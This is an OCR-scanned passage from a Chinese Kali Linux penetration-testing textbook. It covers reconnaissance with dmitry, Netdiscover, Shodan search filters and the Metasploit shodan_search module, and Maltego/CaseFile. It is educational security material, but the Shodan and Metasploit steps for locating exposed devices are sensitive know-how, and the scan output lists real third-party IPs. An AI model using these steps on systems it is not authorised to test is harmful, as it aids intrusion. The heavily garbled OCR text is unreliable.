项 ， 查 询 合 理 的 子 域 。 执 行 命 全 如 下 所 示 : 





root@kali:~# dmitry -s google.com 

Deepmagic Information Gathering Tool 

"There be some deep magic going on" 
HostIP:173.194.127./71 

HostName: google.com 

Gathered Subdomain information for google.com 
Searching Google.com: 86... 

HostName: www.google.com 

HostIP:173.194.127.51 

Searching Altavista.com: 80... 

Found 1 possible subdomain(s) for host google.com, Searched © page: 
All scans completed, exiting 


[S 


从 输出 的 信息 中 ， 可 以 看 到 搜索 到 了 一 个 子 域 。 该 子 域名 为 www.google.com，1P 
地 址 为 173.194.127.51。 该 命令 轩 认 是 从 google.com 网 站 搜索 ， 如 果 不 能 连接 
google.com 网 站 的 话 ， 执 行 以 上 命 全 料 会 出 现 Unable to connect: Socket Connect 
Error 错 误 信息 。 





4.7.2 ARP 侦查 工 具 Netdiscover 


Netdiscover 是 一 个 主动 /被 动 的 ARP 侦 查 工 具 。 该 工具 在 不 使 用 DHCP 的 无 线 网 络 
上 非常 有 用 。 使 用 Netdiscover 工 具 可 以 在 网 络 上 扫 摘 IP 地 址 ， 检 查 在 线 主 机 或 搜索 
为 它们 发 送 的 ARP 请 求 。 下 面 将 介绍 Netdiscover 工 具 的 使 用 方法 。 


Netdiscover 命 命 的 语法 格式 如 下 所 示 : 


netdiscover [-i device] [-r range | -1 file | -p] [-s time] [-n no 
以 上 语法 中 ， 各 选项 参 效 合 义 如 下 所 示 。 


-i device : 指定 网 络 设备 接口 。 

-r range : 指定 扫 摘 网 络 学 围 。 

-| file : 指定 扫描 范围 列表 文件 。 

-p : 使 用 被 动 模式 ， 不 发 送 任何 数据 。 

-s time : 每 个 ARP 请 求 之 间 的 睡眠 时 间 。 
-n node : 使 用 八字 节 的 形式 扫描 。 

-c count : Z SARP 青 求 的 时 间 次 数 。 

-f : 使 用 主动 模式 。 

-d : 忽略 配置 文件 。 

-S : 启用 每 个 ARP 请 求 之 间 抑 制 的 睡眠 时 间 。 
-P : 打印 结 

-L: 将 捕获 信息 办 偷 出 ， 并 继续 进行 扫 搞 。 


【实例 4-5】 使 用 Netdiscover 工 具 攻 击 扫 摘 局 域 网 中 所 有 的 主机 。 执 行 命令 如 下 所 


/小 - 





root@kali:~# netdiscover 


执行 以 上 命 分 后 ， 将 显示 如 下 所 示 的 信息 : 


Currently scanning: 10.7.99.0/8 | Screen View: Unique Hosts 


692 Captured ARP Req/Rep packets, from 3 hosts. Total size: 41520 


IP At MAC Address Count Len MAC Vendor 
192. 168.6.102 00:e0:1c:3c:18:79 296 17760 Cradlepoint, iid 
192.168.6.1 14:e6:e4:ac:fb:20 — 387 23220 Unknown vendor 
192.168.6.110 00:0c:29:28:2b:02 09 540 VMware, Inc. 


从 输出 的 信息 中 ， 可 以 看 到 扫 折 到 了 三 台 主 机 。 其 IP 地 址 分 别 为 192.168.6.102、 
192.168.6.1 和 192.168.6.110。 


4.7.3 搜索 引擎 工具 Shodan 


Shodan 是 互联 网 上 最 强大 的 一 个 搜索 引擎 工具 。 该 工具 不 是 在 网 上 搜索 网 址 ， 而 是 
下 接 搜 索 服 务 器 。Shodan 可 以 说 是 一 蒜 " 黑 蜡 ? 谷 歌 ， 一 下 不 停 的 在 寻找 看 所 有 和 互 
联网 连接 的 服务 器 、 摄 斧头 、 Py d digiti 每 个 月 都 会 在 大 约 5 亿 个 服务 器 

上 日 夜 不 停 的 搜集 信息 。 下 面料 介绍 Shodan 工 具 的 使 用 。 


Shodan 的 官网 网 址 是 www.shodanhq.com。 打 开 该 网 址 界面 ， 如 图 4.5 所 示 。 
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44.5 Shodan E W 


如 果 要 搜索 一 些 东 西 时 ， 在 Shodan 对 应 的 文本 框 中 输入 搜索 的 内 容 。 然 后 ， 单 击 
Search 按 钮 开始 搜索 。 例 如 ， 用 户 想 要 搜索 思科 路 由 器 ， 则 在 搜索 框 中 输入 
Cisco， 并 单 击 Search 按 钮 。 搜 索 到 结果 后 ， 显示 界面 如 图 4.6 所 示 。 
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图 4.6 搜索 结果 


从 该 界面 可 以 看 到 搜索 到 全 球 三 百 多 万 的 Cisco 路 由 器 。 在 该 界面 用 户 可 以 单 击 任 
何 IP 地 址 ， 下 接 找 到 该 设备 。 


在 使 用 Shodan 搜 索引 擎 中 ， 可 以 使 用 过 滤器 通过 缩小 搜索 沁 围 快速 的 查询 需要 的 
东西 。 如 查找 运行 在 美国 lIS 8.0 的 所 有 IIS 服 务 ， 可 以 使 用 以 下 搜索 方法 ， 如 图 4.7 
ATA 
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图 4.7 搜索 的 IIS 服 务 


在 该 界面 显示 了 搜索 到 的 一 个 lIS 8.0 服 务 器 。 从 搜索 到 的 设备 中 ， 可 以 看 到 天 于 该 
服务 器 的 标题 信息 、 所 在 的 国家 、 主 机 名 和 文本 信息 。 


在 Shodan 搜 索 时 ， 需 要 注意 一 些 过 滤器 命 全 的 语法 。 瘦 见 的 几 种 情况 如 下 所 示 。 
1. Cityfl Countryap 45 
使 用 City 和 Country 命 全 可 以 缩小 搜索 的 地 理 位 置 。 如 下 所 示 。 


e country:US 表 示 从 美国 进行 搜索 。 
e city:Memphis 表 示 从 孟 非 斯 城市 搜索 。 


City 和 Country 命 令 也 可 以 结合 使 用 。 如 下 所 示 。 
e country:US city:Memphis。 
2. HOSTNAME R S 
HOSTNAME fp 438 31 TH XE EL 2 43 Hs TI. 
e hostname:google 表 示 搜 索 google 主 机 。 
3. NETAS 
使 用 NET 命 令 扫 朱 单 个 IP 或 一 个 网 络 范围 。 如 下 所 示 。 


e net:192.168.1.10 : 扫 摘 主机 192.168.1.10。 
e net:192.168.1.0/24 : 扫 摘 192.168.1.0/24 网 络 内 所 有 主机 。 


4. Tilea 
使 用 Title 命 邻 可 以 搜索 项 目 。 如 下 所 示 。 

e title:“Server Room" 表 示 搜 索 服 务 器 机 房 信 息 。 
5. 关键 字 搜 索 


Shodan 使 用 一 个 关键 字 搜 索 是 最 受 欢迎 的 方式 。 如 果 知 道 目 标 系 统 使 用 的 服务 器 
类 型 或 车 入 式 服 务 器 名 ， 来 搜索 一 个 Web 页 面 是 很 容易 的 。 如 下 所 示 。 


e apache/2.2.8 200 ok : 表示 搜索 所 有 Apache 服 务 正 在 运行 的 2.2.8 版 本 ， 并 且 


仅 搜索 打开 的 站 点 。 
e apache/2.2.8 -401 -302 : 表示 跳 过 显示 401 的 非法 页 或 302 删 除 页 


6. 组 合 搜 索 


e |IS/7.0 hostname:YourCompany.com city:Boston 表 示 搜 索 在 波士顿 所 有 正在 运 


行 1IS/7.0 的 Microsoft 服 务 器 。 
e |[S/5.0 hostname:YourCompany.com country:FR 表 示 搜 索 在 法 国 所 有 运行 


上 1S/5.0 的 系统 。 
e Title:camera hostname:YourCompany.com 表 示 在 某 台 主机 中 标题 为 camera 的 
信息 。 


e geo:33.5,36.3 os:Linux 表 示 使 用 坐标 轴 (经 度 33.5， 纬 度 36.3) 的 形式 搜索 
Linux 操 作 系统 。 


7. 其 他 搜索 术语 


e Port : 通过 端口 号 搜索 。 
e OS : 通过 操作 系统 搜索 。 
e After 或 Before : 使 用 时 间 搜 索 服 务 。 


【实例 4-6】 使 用 Metasploit 实 现 Shodan 搜 索 。 具 体操 作 步 又 如 下 所 示 。 
(1) 在 Shodanhq.com 网 站 注册 一 个 免费 的 帐户。 


(2) Mhttp://www.shodanhq.com/api _ doc 网 站 获取 API key， 获 取 界 面 如 图 4.8 所 
示 。 获 取 API key， 为 了 在 后 面 使 用 。 
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图 4.8 获取 的 API key 
(3) 和 启动 PostgreSQL 服 务 。 执 行 命令 如 下 所 示 : 


root@kali:~# service postgresql start 


(4) 启动 Metasploit 服 务 。 执行 命令 如 下 所 示 : 


root@kali:~# service metasploit start 


(5) BAMSFAvm, HTAA RAM : 


root@kali:~# msfconsole 
msf > 


(6) 选择 auxiliary/gather/shodan search 模 块 ， 并 查看 该 模块 下 可 配置 的 选项 参 
数 。 执 行 命 分 如 下 所 示 : 


msf > use auxiliary/gather/shodan search 
msf auxiliary(shodan search) > show options 
Module options (auxiliary/gather/shodan search): 


Name Current Panes tle uired Description 

DATABASE false no Add search results to the database 

FILTER no Search for a specific IP/City/Country /Host name 
MAXPAGE 1 yes Max amount of pages to collect 

OUTFILE no A filename to store the list of IPs 

Proxies no Use a proxy chain 

QUERY yes Keywords you want to search for 

SHODAN APIKEY yes The SHODAN API key 

VHOST www.shodanhq.com yes The virtual host name to use in requests 


从 以 上 输出 信息 中 ， 可 以 看 到 有 四 个 必须 配置 选项 参数 。 其 中 有 两 个 选项 已 经 配 
E, QUERY#ISHODAN APIKEY 还 没有 配置 。 


(7) 配置 QUERY 和 SHODAN APIKEY 选 项 人 参数。 执行 命 舍 如 下 所 示 : 


msf auxiliary(shodan search) > set SHODAN APIKEY duV9vwgCmoOoDfWqf 
SHODAN APIKEY => duV9vwgCmoOoDfWqfWafax8s]jOZUab5BU 

msf auxiliary(shodan search) » set QUERY iomega 

QUERY -» iomega 


4 RR 
从 输出 的 信息 中 ， 可 以 看 到 QUERY 和 SHODAN_APIKEY 选 项 成 功 配置 
(8) 所 动 搜 笋 引擎 。 执 行 命 分 如 下 所 示 : 





msf auxiliary(shodan_search) > run 

[+] Total: 160943 on 3219 pages. Showing: 1 
[*] Country Statistics: 

[+] United Kingdom (GB): 27408 

[+] United States (US): 25648 

[*] France (FR): 18397 

[+] Germany (DE): 12918 

[*] Netherlands (NL): 6189 

[+] Collecting data, please wait... 


IP Results 
IP City Country Hostname 
104.33.212.215:80 N/A N/A cpe-104-33-212-215.s0cal.res.rr.com 
107.3.154.298:80 Cupertino United States | c-107-3-154-29.hsd1.ca.comcast net 
108.0.152.164:443 Thousand Oaks United States . pool-108-0-152-164.Isanca.fios. venzon.net 
108.20.167.210:80 Maynard United States 
pool-108-20-167-210.bstnma.fios.verizon.net 
108.20.213.253:443 Franklin United States 
pool-108-20-213-253.bstnma.fios.verizon.net 
109.156.24.235:443 Sheffield United Kingdom 


host109-156-24-235.range109-156.btcentralplus.com 
129.130.72.209:443 Manhattan United States 


130.39.112.9:80 Baton Rouge United States Isf-museum.isu.edu 

146.52.252.157:80 Leipzig Germany  ip9234fc9d.dynamic.kabel-deutschland.de 

147.156.26.160-80 Valencia Spain gpoeibak.optica.uv.es 

94.224.87.80:8080 Peutie Belgium 94-224-87-80.access.telenet.be 

95.93.3.155:80 Faro Portugal a95-93-3-155.cpe.netcabo.pt 

96.232.103.131:80 Brooklyn United states 
pool-96-232-103-131.nycmny.fios.verizon.net 

96.233.79.133:80 Woburn United States 
pool-96-233-79-133.bstnma.fios.verizon.net 

96.240.130.179:443 Arlington United States 


pool-96-240-130-179.washdc.fios.verizon.net 
97.116.40.223:443 Minneapolis United States 97-116-40-223.mpls.qwest.net 
97.76.110.250:80 Clearwater United States rrcs-97-76-110-250.se.biz.rr.com 


98.225.213.167:443 Warminster United States 
c-98-225-213-167.hsd1.pa.comcast.net 
[*] Auxiliary module execution completed 


以 上 输出 的 信息 显示 了 匹配 iomega 天 键 字 的 所 有 人 信息。 搜索 的 结果 显示 了 四 列 ， 分 
别 表 示 IP 地 址 、 城 市 、 国 家 和 主机 名 。 如 果 想 要 使 用 过 滤 天 键 字 或 得 到 更 多 的 响应 
页 ， 用 户 必须 要 购买 一 个 收费 的 APlkey。 


4.8 使 用 Maltego 收 集 信 息 


Maltego 是 一 个 开源 的 漏洞 评估 工具 ， 它 主要 用 于 论证 一 个 网 络 内 单 点 故障 的 复杂 
性 和 严重 性 。 该 工具 能 够 聚集 来 目 内 部 和 外 部 资源 的 信息 ， 并 且 提 供 一 个 清晰 的 漏 
洞 分 析 界 面 。 本 节 将 使 用 Kali Linux 作 系统 中 的 Maltego， 演示 该 工具 如 何 帮 助 用 
户 收 集 信 息 。 


4.8.1 准备 工作 


在 使 用 Maltego 工 具 之 前 ， 需 要 到 
https:Wwww.paterva.com/web6/communitymaltego/ 网 站 注册 一 个 账 写 。 注 册 界 面 
如 图 4.9 所 示 。 
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Register an account today for free! 











Firstname 

Lastname iv 

Organisation communi tay 

Email Address 10120725546q4. con 
Password me 

Password Confirmation me 


Captcha 





图 4.9 注册 账号 
在 该 界面 填写 正确 信息 后 ， 单 击 Register 按 钮 ， 将 完成 注册 。 此 时 ， 注 册 账 号 时 使 
用 的 邮箱 将 会 收 到 一 份 邮 件 ， 登 录 邮 箱 ， 将 用 户 账 户 激 活 。 


4.8.2 使 用 Maltego 工 具 


使 用 Maltego 工 具 收 集 信 息 。 具 体操 作 步 又 如 下 所 示 : 


(1) B 启动 Maltego 工 具 。 依次 选择 “应 用 程序 ”|Kali Linux E EJ S" |" 4 43 
析 "|maltego 命 个 信 ， 将 显示 如 图 4.10 所 示 的 界面 。 



































Welcome to M altego! 


Steps Startup wizard - Welcome (1 of 5) 

1. Welcome 

2. Login Welcome to Maltego! 

3. Login result 

4. Select transform seeds This wizard will guide you through the steps of setting up your Maltego Client 
5. Update transforms for first use 


We hope that you enjoy using our product as much as we enjoy building it! 


Please note that the Community Edition is intended for non-commercial use 
onhy? 








| Next» 


Cancel 


图 4.10 Maltego 欢 迎 界 面 
(2) 在 该 界面 单 击 Next 按 钮 ， 将 显示 如 图 4.11 所 示 的 界面 。 




















Welcome to Maltego! 


Steps q Startup wizard = Login (2 of 5) 

1. Welcome Enter your details below to log in to the Maltego Community Server 
2. Login 

3. Login result Or if you have not done so yet, register here 

4. Select transform seeds 

5$. Update transforms Login 


* Email Address 


Password 





* Solve captcha 





图 4.11 登录 界面 


(3) 在 该 界面 输入 前 面 注册 用 户 时 的 邮箱 地 址 和 密码 及 验证 码 。 然 后 单 击 Next 按 
钮 ， 将 显示 如 图 4.12 所 示 的 界面 。 


=l 


Steps 

1. Welcome 

à. Login 

3. Login result 

4, Select transform seeds 
5. Update transforms 





84.12 登录 成 功 


Welcome to Maltego! ~ | 


Startup wizard - Login result (3 of 5) 


Hello li, welcome to Maltego Community Edition! 
Personal details 
Firstname — li 
Surname — yw 


Email address — GENEEEEREEM E o9.com 


Your AP] key is valid until April 24, 2014 at 12:00:00 AM CST 


(4) 该 界面 显示 了 登录 结果 信息 。 此 时 ， 单 击 Next 按 钮 ， 将 显示 如 图 4.13 所 示 的 
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| Steps 

| 1 Welcome 

| 4 login 

| 3 Login result 

| 4. Select transform seeds 
| 5. Update transforms 





图 4.13 xb 13 Pr T RA 


Welcome to Maltego! 


Startup wizard - Select transform seeds (4 of 5) 


Discover transforms from 
v] Maltego public servers 


_] Local TAS (Transform Application Server) 


Note: The transform seed settings can be changed later through Manage-»Discover 
Transforms. 


m " J Lo = —À 








(5) 在 该 界面 发 现 转换 节操 信息 的 来 源 。 然 后 单 击 Next 按 钮 ， 将 显示 如 图 4.14 所 
示 的 界面 。 


Welcome to Maltego! 


steps Startup wizard - Update transforms (5 of 5) 


Welcome 

Login Ready...Set...GO! 

Login result 

Select transform seeds Your new Maltego client has been initialized sucessfully! 
Update transforms 


wah = 


3 new application server(s) were found k 
123 new transforms were found 


75 new entities were installed 


You are now ready to use Maltego! 
WV Run a machine (NEW!) 
LJ Open a blank graph and let me play around 
i! Open an example graph 


> Go away, | have done this before! 





Cancel 





图 4.14 更 新 转换 节点 


(6) 在 该 界面 选择 怎样 使 用 Maltego， 这 里 选择 默认 的 选项 Run a 
machine(NEWI。 然 后 单 击 Finish 按 钮 ， 将 显示 如 图 4.15 所 示 的 界面 。 


Start a Machine 


Steps Run Machine - Choose machine (1 of 2) 


1. Choose machine 
| 2. Specify target 
| ® Company Stalker 


Please select the machine to run from the list below. 


2 Footprint L1 


t Footprint L2 


.J Footprint L3 





iw] Show on startup 


W] Show on empty graph click 








图 4.15 选择 主机 
(7) 该 界面 用 来 选择 运行 的 主机 ， 这 里 选择 Company Stalker (组 织 网 ) 选项 。 
后 单 击 Next 按 钮 ， 将 显示 如 图 4.16 所 示 的 界面 。 


Start a Machine 


Steps Run Machine - Specify target (2 of 2) 


1. Choose machine 


The Company Stalker machine requires the following inputs: 
2. Specify target 


Domain Name  naterva.com 





图 4.16 指定 目标 


(8) 在 该 界面 输入 一 个 域名 。 然 后 单 击 Finish 按 钮 ， 将 显示 如 图 4.17 所 示 的 界面 。 


Results Limited k 


A Note that results within machines are restricted to 12 entities in the Community Edition. 


L Don't show again 


图 4.17 Results Limited 


(9) 该 界面 提示 信息 在 paterva.com 主 机 中 仅 限于 12 个 实体 。 在 该 界面 选择 Don't 


show again， 然 后 单 击 OK 按 钮 ， 将 显示 如 图 4.18 所 示 的 界面 。 
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图 4.18 运行 的 主机 


(10) 该 界面 显示 了 刚 创建 的 paterva.com。 如 果 没 显示 ， 在 右 侧 栏 Palette 下 选择 
Domain， 然 后 用 鼠标 拖 搜 域名 到 Graph 中 。 在 该 界面 选择 paterva.com 域 名 ， 将 会 
在 右 侧 栏 显 示 paterva.com 域 名 的 相关 信息 ， 如 图 4.19 所 示 。 该 域名 的 信息 可 以 修 
改 ， 如 修改 域名 。 单 击 Property View 框 中 的 Domain Name, Y% imer i A AJASE 
名 就 可 以 修改 。 例 如 ， 将 这 里 的 域名 paterva.com 修 改 为 targethost.com， 将 显示 如 
图 4.20 所 示 的 界面 。 
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El 4.19 paterva.com 信 息 
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图 4.20 targethost.com 信 息 


(11) 一旦 目标 主机 设置 成 功 后 ， 用 户 融 可 以 和 启动 收集 信息 。 首 先 右 击 创建 的 域 实 
体 ， 并 选择 Run Transform 将 显示 有 效 的 选项 ， 如 图 4.21 所 示 。 
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图 4.21 启动 收集 信息 


(12) 在 该 界面 可 以 选择 寻找 DNS 名 ， 执 行 WHOIS 和 获取 电子 邮件 地 址 等 等 。 或 
者 选择 运行 所 有 转换 ， 显 示 结 果 如 图 4.22 所 示 。 
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(13) 人 大 取 了 很 多 关于 targethost com 的 信息 。 用 户 也 可 以 使 用 
同样 的 方法 ， X ndm Pa =E 获取 想 要 查看 的 信息 /No 


Ma gi Maltego 是 由 Paterva 创 建 的 一 个 开源 工具 ， 用 于 
信息 收集 和 取证 。 前 面 分 别 介 绍 了 Maltego 的 安装 向 导 ， 通 过 拖 虑 它 到 图 表 中 并 使 
用 该 域 实体 。 观 在 将 学 习 允 省 Maltego 去 状 会 制 自己 的 图 表 ， 并 检查 各 种 来 源 完成 工 
作 。 因 为 用 户 可 以 利用 这 一 点 自动 化 快速 地 在 目标 网 络 内 收集 信息 ， 如 电子 邮件 地 
址 、 服务 器 和 执行 WHOIS 坦 询 等 。 


户 可 以 通过 Transform Manager 窗 口中 All Transforms 标 签 ， 启 动 和 禁用 转换 节 
忆 ， 如 图 4.23 所 示 。 
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AliasToFacebookProfile kg 
Returns a Facebook affilkation for an alias (phrase) 
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图 4.23 Transform Managers? 
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disclaimer。 接 受 disclaimer 的 方法 ， 人 在 该 界面 选择 转换 节点 后 ， 单 击 最 底部 的 View 


disclaimer 按 钮 ， 将 显示 如 图 4.24 所 示 的 界面 。 


4.8 使 用 Maltego 收 集 信 息 


To 
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Transform Disclaimer 





FlickrAccountGetFriends 


Please note this transform is being run on the Paterva Transform 
Distribution Server and has been written by the user ‘Andrew 
MacPherson'. This transform will be run on 
http://alpine.paterva.com/cgi-bin/flickrGetFriends. py and Paterva 
cannot be held responsible for any damage caused by this 
transform, you run this AT YOUR OWN RISK. For more 
information on this transform feel free to contact 

andrew@ paterva.com Additional: PoC Only! Please do not use 
outside of this workshop. 


























图 4.24 Transform Disclaimer 


在 该 界面 将 | accept the above disclaimer 复 选 框 勾 上 ， 然 后 单 击 Close 按 钮 就 可 以 


Oo 
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4.9 绘制 网 络 结构 图 


CaseFile 工 具 用 来 绘制 网 络 结构 图 。 使 用 该 工具 能 快速 添加 和 连接 ， 并 能 以 图 形 界 
面 形式 灵活 的 构建 网 络 结构 图 。 本 节 将 介绍 Maltego CaseFile 的 使 用 。 


在 使 用 CaseFile 工 具 之 前 ， 需 要 修改 系统 使 用 的 Java 和 Javac 版 本 。 因 为 CaseFile 
工具 是 用 Java 开 发 的 ， 而 且 该 工具 必须 运行 在 Java1.7.0 版 本 上 。 但 是 在 Kali Linux 
中 ， 安 和 了 JDK6 和 JDK7， 而 CaseFile 黑 认 使 用 的 是 JDK6。 此 时 运行 CaseFile 工 具 
后 ， 图 形 界面 无 法 显示 菜单 栏 。 所 以 就 需要 改变 JDK 版 本， 改变 JDK 版 本 的 方法 如 
下 所 示 。 


使 用 update-alternatives 命 令 修 改 java 命 令 版 本 。 执 行 命 令 如 下 所 示 : 


root@kali:~# update-alternatives --config java 


A 2 个 候选 项 可 用 于 替换 java (提供 /usr/bin/java). 


选择 路 径 优先 级 状态 
+0 lusr/lib/jvm/java-6-openjdk-i386/jre/bin/java 1061 自动 模式 

1 /usrilib/jym/java-6-openjdk-i366/jre/bin/java 1061 手动 模式 

2 lusr/lib/jvm/java-7-openjdk-i386/jre/bin/java 1051 手动 模式 
要 纵 持 当前 值 [*] 请 按 回 车 键 ， 或 者 键入 选择 的 编号 : 2 # 输 六 JDK? 版 本 编号 


update-alternatives: using /usr/lib/ivmijava-f-openjdk-i386/jre/bin/java to provide /usr/bin/java 
(java) in 手动 模式 


从 输出 的 信息 中 可 以 看 到 已 经 修改 为 JDK7 版 本 ， 而 且 是 手动 模式 。 或 者 使 用 java 命 
人 查看 当前 的 版 本 信息 ， 执 行 全 分 如 下 所 示 : 


root@kali:~# java -version 

java version "1.7.0 25" 

OpenJDK Runtime Environment (IcedTea 2.3.10) (7u25-2.3.10-1-deb7u1. 
OpenJDK Server VM (build 23.7-b01, mixed mode) 


a] 
从 以 上 结果 中 可 以 确定 当前 系统 的 java 命 全 版 本 是 1.7.0。 


使 用 update-alternatives 命 合 修 改 javac 命 命 版本。 执行 命 合 如 下 所 示 : 





root@kali:~# update-alternatives --config javac 


有 2 个 候选 项 可 用 于 替换 javac (提供 /usr/bin/javac). 


选择 路 径 wR TS 
* 0 lusr/lib/jvm/java-6-openjdk-i386/bin/javac 1061 自动 模式 

1 lusrilib/jvm/java-6-openjdk-i386/bin/javac 1061 手动 模式 

2 lusr/lib/jvm/java-7-openjdk-i386/bin/javac 1051 FARR 
Rie SAE Heese, EAR RRG: 2 # 输 入 JDKT 版 本 编写 


update-alternatives: using /usr/lib/jvm/Java-7-openjdk-i386/bin/javac to provide /usr/bin/javac 
(javac) in 手动 模式 


大 学 霸 Kali Linux 安全 渗透 教程 


从 输出 的 信息 中 可 以 看 到 已 经 修改 为 JDK7 版 本 ， 而 且 是 手动 模式 。 这 时 ， 再 使 用 
javac 命 仿 查 看 当前 的 版 本 信息 ， 执 行 命令 如 下 所 示 : 


root@kali:~# javac -version 
java version "1.7.0 25" 


从 以 上 结果 中 可 以 确定 当前 系统 的 javac 命 爷 版 本 是 1.7.0。 
【实例 4-7】 使 用 CaseFile 工 具 绘 制 一 个 网 络 结构 图 。 有 具体 操作 步骤 如 下 所 示 。 


(1) 启动 CaseFile。 依 次 选择 “应 用 程序 ”|Kali Linux E RKE” "情报 分 析 "|casefile 
命令 ， 将 显示 如 图 4.25 所 示 的 界面 。 


Welcome to Maltego! 


Startup wizard - Welcome (1 of 2) 














1. Welcome 
2. Ready..Set..Go! Welcome to Maltego CaseFile! 


We hope that you enjoy using our product as much as we 
enjoy building it! 

















E 4.25 欢迎 界面 
(2) 该 界面 是 一 个 欢迎 信息 ， 这 里 单 击 Next 按 钮 ， 将 显示 如 图 4.26 所 示 的 界面 。 


4.9 绘制 网 络 结构 图 16< 
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Welcome to Maltego! 


Startup wizard = Ready..5et..Go! (2 of 2) 





Steps 
1. Welcome 
2. Ready..Set..Go! Ready...Set...GO! 


What do you want to do next? 
* Open a blank graph and let me play around 
O Open an example graph 
O Go away, | have done this before! 


= 


case case 5 Fi le s 


























图 4.26 设置 向 导 


(3) 该 界面 选择 将 要 进行 什么 操作 。 这 里 选择 Open a blank graph and let me play 
around, Sn 将 显示 如 图 4.27 所 示 的 界面 。 


更 re LEE Ma eFile Community 1.0.1 


= 


LI 
Investigate Manage Organize 


KY: nit m I BAAA a 89738 


n i Quick | Entit MIKK ® = 人 
| @Delete Find | Selection ss 7, /, $t ^ — «€ A) 
ET uu : | Find - Selection | | Zoom | 
| 4|! 5 G 7 





RS Detai. | » x 


<no selection> 





44.27 eA 


(4) 从 该 界面 可 以 看 至 | 没有 任何 信息 ， 因为 默认 没有 选择 任何 设 各 。 该 工具 3 AI 
Maltego lL E.—4£, #2 MB Palette PHRST 32483 E] zrh, AND rn e dE dts ER 
域 实 体 ， 并 且 改 变 域 属性 ， 如 图 4.28 所 示 。 
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AK +} AT IL 


IFANE 
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vaatis te Manage Organize 


| poor M [|J ?9^^^ V 
Paste Clear o Cut Quick Entity 2$ ef X P d 
All 9 Delete Find Selection AA = 








|an) Pal.. | « T LS pn New Graph (1)* x 
m — — | Bubble View | Entity List 
© Events | ! 
© Groups 
Ç Infra... 





paterva.com 
. Domain — Property View 
An interi © Properties 
IPv4 Ad Type 
An iP wee Domain Name pate rva.. 
E WHOIS Info 





























图 4.28 域名 实体 


(5) 在 该 界面 可 以 为 域 添 加 一 个 注释 。 将 鼠标 指 到 域 实 体 上 ， 然 后 双击 注释 图 
标 ， 将 显示 如 图 4.29 所 示 的 界面 。 


Maltego CaseFile Community 1.0.1 


Investigate Manage Organize 


K | i € A pí shhh A 
Paste Clear ^ . Quick Entity dips x 5 
All en Delete Find Selection ss FA düa w 
Bia Pal. (« ge AG New Graph (1)* x 
| z [ | —— - 
& Devic.. “| Main view Bubble View ^ Entity List 
€- Events M 
€- Groups |- 
e Infra... 
& AS 


" i 
AP Tce! 





This i5 our starting point 


paterva com 


- Property View 
© Properties 
Type 
Domain Name paterva....|.| | 
-0 WHOIS Info | 
































4.29 添加 ; 注释 


(6) 在 该 界面 可 以 看 到 添加 的 法 主 释 信息 ， 该 信息 可 以 修改 。 将 鼠标 点 到 尘 主 释 信息 
的 位 置 即 可 修改 。 在 该 界面 还 可 以 拖 虑 其 他 实体 ， 这 里 拖 另 一 个 实体 域名 ， 用 来 记 
录 来 自 目标 主机 的 DNS 信 息 ， 如 图 4.30 所 示 。 
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a se 
9? aXX 5 


te 


Paste clear Quick LM 


Selection ss oe ^ 请 


All " @ beet Find 


Infrastru... 
AS. 


An internet 7 


Domain Name thr 
Domain _— 


An internet « 
IPva Addres ' 

An IF version 

MX Record ME 

A DNS mail ex alpine paterva.com 
NS Record 








paterva.com 


v b ewe 


图 4.30 域名 实体 


(7) 在 该 界面 可 以 将 这 两 个 实体 连接 起 来 。 只 需 


个 实体 即 可 ， 如 图 4.31 所 示 。 


H alteqao aseFile Community 1.0 


Manage Organize 


K v." M A 


Paste Clear z Quick Entity 
Ali pe Find Selection = st — 


=] 0. Start Page = Es Mew Graph (1)* x 
Main View | Bubble View Entity List 

& Events 

& Groups 

© Infrastru... 

m AS 


e 


This i$ our starting point 


An internet 
. DNS Name Gh P 
I Domain Nam 


aterva com 
P E 





, Domain 


An internet d 


IPv4 Addres 


E. An IP versioni ^ = 
Bs MX Record | PUER 


| 
A DAS mail ex alpine paterva.com 


图 4.31 连接 两 个 实体 
(8) 连接 两 个 实体 后 ， 将 显 


4.9 绘制 网 络 结构 图 














— Property View 
| € Properties 


Domain Name paterva..... 
ll WHOIS Info 


[9 Graph info 


要 拖 一 个 线 ， 从 一 个 实体 到 另 一 


| x Detail View 


1 INS Nan | | 
ML alpine.patery | 
= Property View 
© Properties 
Type 
ONS Name 
| © Graph into 
Weight 


alpine.p... | i 


示 如 图 4.32 所 示 的 界面 。 
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Properties X 

Label 
Show Label | 
Color 
Style 


Thickness 


m 


|. Jj Do not show this dialog again 


" 








44.32 线条 属性 界面 
(9) 该 界面 用 来 设置 线条 的 属性 。 可 以 修改 线 的 粗细 了、 格式 和 颜色 等 。 


(10) 重复 以 上 第 (5). (6. (7) 和 (8) 步骤 添加 更 多 信息 ， 来 绘制 网 络 
图 。 下 面 绘制 一 个 简单 的 组 织 网 络 结构 图 ， 如 图 4.33 所 示 。 


«| > Start Page = Sf New Graph (1)* x 


^] MainView Bubble View Entity List | 


Target Company 























192 168.10.101 


paterva.com 74.207.243.85 ante 


192.168.10,106 


ws 


www paterva.com 192 168.10 201 














4.9 绘制 网 络 结构 图 166 
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图 4.33 组 织 网 络 


(11) 从 该 界面 可 以 看 到 一 个 组 织 网 络 结构 图 。 此 时 用 户 可 以 保存 该 图 ， 如 来 需要 
的 时 候 ， 以 后 可 以 打开 并 编辑 该 图 。 如 果 需 要 重新 打开 一 个 Graph 窗口 ， 可 以 单 击 


A+B A vale 图 标 ， 如 图 4.34 所 示 。 


m: P = feb Em ha Lego CaseFile Č ammunity 1.0.1 








Recent Documents 


Ey 


i 
E Open 


H Save 

Save All 

kd Save As 

B. Save to Server 





GE Detai. | 


ng Import , qno selection 
i e Export H 
"v Print 2 


More about CaseFile + 


| ™ 


M Exit ~ Options n 








E | 
图 4.34 新 建 Graph 


在 该 界面 单 击 New 按 钮 ， 将 会 创建 一 个 新 的 Graph， 此 时 会 命名 为 New Graph(2)， 
如 图 4.35 所 示 。 


Maltego CaseFile Community 


| Investigate Manage Organize 


a | e Ji FA 


Paste Clear pcm Quick 2Y 7 
All T Find | Selection h 4. /. 9! 7 


" p qu 
TEI La 


x | [E startpage ~ "r ) 
Main view ] Bubble View = Entity List 











, Domain 
An intern 


Netblock |= 4/ 
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图 4.35 新 建 的 New Graph(2) 


第 5 革 ”漏洞 扫 摘 


漏洞 打 描 器 是 一 种 能 够 自动 在 计算 机 、 信 息 和 系统、 网 络 及 应 用 软件 中 寻找 和 发 现 安 
全 弱点 的 程序 。 它 通过 网 络 对 目标 系统 进行 探测 ， 同 目标 系统 发 生 数据 ， 并 将 反馈 
